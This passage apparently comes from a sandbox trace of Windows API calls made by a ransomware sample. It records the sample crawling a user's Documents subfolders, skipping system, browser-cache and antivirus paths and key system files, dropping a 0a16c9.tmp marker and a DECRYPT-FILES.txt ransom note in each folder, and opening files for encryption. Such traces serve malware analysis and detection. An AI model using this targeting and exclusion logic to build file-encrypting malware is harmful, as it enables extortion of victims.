param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\0a16c9.tmp") returned 60 [0185.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.271] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0185.271] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.271] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 67 [0185.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.272] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned 49 [0185.272] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*" [0185.272] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0xae4e9c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx.x2HVYj7", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0185.272] CloseHandle (hObject=0x25c) returned 1 [0185.272] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0185.272] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0185.272] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0185.272] lstrcatW (in: lpString1="My Pictures", lpString2="\\" | out: lpString1="My Pictures\\") returned="My Pictures\\" [0185.272] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Pictures\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\" [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Program Files") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch=":\\Windows") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Games\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\All Users") returned 0x0 [0185.272] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.273] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.273] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.273] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="AhnLab") returned 0x0 [0185.273] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0185.273] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.273] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\0a16c9.tmp") returned 63 [0185.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0185.273] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.273] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 70 [0185.273] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.273] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned 52 [0185.273] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*" [0185.274] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ba0ec0, ftCreationTime.dwHighDateTime=0x1d4cf27, ftLastAccessTime.dwLowDateTime=0x7bf3e5c0, ftLastAccessTime.dwHighDateTime=0x1d4ceae, ftLastWriteTime.dwLowDateTime=0xae4e9c40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xd6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="wmJzl1cTVU87z.xlsx.x2HVYj7", cAlternateFileName="苟眔酯ͯ")) returned 0xffffffff [0185.274] CloseHandle (hObject=0x25c) returned 1 [0185.274] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0185.274] lstrcmpW (lpString1="My Shapes", lpString2=".") returned 1 [0185.274] lstrcmpW (lpString1="My Shapes", lpString2="..") returned 1 [0185.274] lstrcatW (in: lpString1="My Shapes", lpString2="\\" | out: lpString1="My Shapes\\") returned="My Shapes\\" [0185.274] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0185.274] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Program Files") returned 0x0 [0185.274] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch=":\\Windows") returned 0x0 [0185.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Games\\") returned 0x0 [0185.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.275] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\All Users") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="AhnLab") returned 0x0 [0185.276] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.276] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0185.276] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.276] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\0a16c9.tmp") returned 61 [0185.276] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x25c [0185.280] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0185.280] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.280] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\DECRYPT-FILES.txt") returned 68 [0185.280] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.281] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0185.281] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*" [0185.281] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0185.281] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.281] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.281] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.281] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.281] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1247940, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1247940, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1247940, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.281] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.281] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.281] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.282] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.282] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.282] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.282] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.282] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.282] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.282] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0185.282] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.282] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0185.282] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\0a16c9.tmp" [0185.282] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.282] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.282] CloseHandle (hObject=0x0) returned 0 [0185.282] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.283] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.283] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.283] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0185.283] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0185.283] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0185.283] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0185.283] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0185.283] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="DECRYPT-FILES.txt") returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="autorun.inf") returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="boot.ini") returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="desktop.ini") returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="ntuser.dat") returned -1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="iconcache.db") returned -1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="bootsect.bak") returned 1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="ntuser.dat.log") returned -1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="thumbs.db") returned -1 [0185.283] lstrcmpiW (lpString1="Favorites.vss", lpString2="Bootfont.bin") returned 1 [0185.283] lstrlenW (lpString="Favorites.vss") returned 13 [0185.283] lstrcmpiW (lpString1="vss", lpString2="lnk") returned 1 [0185.283] lstrcmpiW (lpString1="vss", lpString2="exe") returned 1 [0185.283] lstrcmpiW (lpString1="vss", lpString2="sys") returned 1 [0185.283] lstrcmpiW (lpString1="vss", lpString2="dll") returned 1 [0185.283] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned 50 [0185.283] lstrlenW (lpString="Favorites.vss") returned 13 [0185.283] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\" [0185.283] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="Favorites.vss" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" [0185.283] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.284] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.284] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=0) returned 1 [0185.284] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x0 [0185.284] CloseHandle (hObject=0x0) returned 0 [0185.284] CloseHandle (hObject=0x264) returned 1 [0185.285] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.285] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0xae6408a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae6408a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0185.285] lstrcmpW (lpString1="_private", lpString2=".") returned 1 [0185.285] lstrcmpW (lpString1="_private", lpString2="..") returned 1 [0185.285] lstrcatW (in: lpString1="_private", lpString2="\\" | out: lpString1="_private\\") returned="_private\\" [0185.285] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\", lpString2="_private\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Program Files") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch=":\\Windows") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Games\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\All Users") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="AhnLab") returned 0x0 [0185.285] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.285] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 59 [0185.285] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.285] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\0a16c9.tmp") returned 70 [0185.285] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, 